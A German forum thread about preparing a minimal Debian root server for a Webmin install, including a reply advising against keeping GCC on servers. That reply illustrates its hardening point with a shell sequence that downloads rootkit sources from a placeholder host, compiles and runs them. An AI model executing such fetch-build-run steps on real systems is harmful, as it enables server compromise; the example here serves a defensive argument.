debian

  • hallo zusammen,
    ich habe einen kleinen root server mit debian drauf,es ist wirklich nur debian drauf und Digest::MD5 mehr nicht,
    was für tools brauche ich voher noch drauf um webmin zu instalieren???
    danke i.v.

  • Ich denk mal GCC solte auf jeden fall drauf sein, sonnst weiß ich jetzt auf anhieb auch nichts, aber starte doch einfach mal die Installation, dann wird er dir schon sagen was fehlt.

  • Zitat von [BTK]Tobi

    Ich denk mal GCC solte auf jeden fall drauf sein, sonnst weiß ich jetzt auf anhieb auch nichts, aber starte doch einfach mal die Installation, dann wird er dir schon sagen was fehlt.


    Da muß ich leider widersprechen...
    gcc muß nicht auf einem Server sein wenn nichts drauf entwickelt/programmiert/kompiliert wird.
    Grundsätzlich ist jedes unnötige Programm auf einem Server eine Stelle mehr die einem u.U. das Genick brechen kann.
    Beispiel bei einem Servereinbruch über SSH (also Shellzugriff):

    Code
    user@host ~ $ wget http://blabla.bla/src/rootkit_sources.tar.bz2
    user@host ~ $ tar xvfz rootkit_sources.tar.bz2
    user@host ~ $ cd rootkit_sources
    user@host ~ $ ./configure
    user@host ~ $ make
    user@host ~ $ ./bin/rootkit


    Klingt paranoid, ich weiß.
    Nichts desto trotz läuft ein rootkit Angriff fast immer nach genau diesem Schema ab.
    Wenn man schon gcc wirklich (also WIRKLICH) für irgendwas auf einem Server braucht sollte man sich sehr genau überlegen wie man das alles absichert.
    Im Zweifelsfall nach Verwendung wieder deinstallieren.


    Cheers


    tcs

    Wer ständig überall dranpinkeln muß kommt schnell in den Verdacht ein keifendes Schoßhündchen zu sein.
    (Bezug auf einen bestimmten Forumsuser ist unvermeidlich)

Jetzt mitmachen!

Sie haben noch kein Benutzerkonto auf unserer Seite? Registrieren Sie sich kostenlos und nehmen Sie an unserer Community teil!